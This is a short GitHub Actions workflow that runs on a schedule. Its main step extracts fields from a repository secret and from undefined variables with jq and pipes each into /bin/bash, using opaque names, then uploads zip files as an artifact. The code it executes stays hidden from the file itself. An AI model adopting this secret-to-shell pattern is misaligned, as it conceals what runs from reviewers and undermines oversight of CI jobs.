name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '58 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  task:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          srup7: ${{ secrets.srup7 }}
        run: |
          printf '%s' "$srup7" | jq -r .ickx571 | /bin/bash
          echo $xy1 | jq -r .k86641 | /bin/bash
          printf '%s' "$aopq1" | jq -r .wy764 | /bin/bash
          echo $y523 | jq -r .jp8 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 1F4xa8Oi
          path: "*.zip"
          retention-days: 1
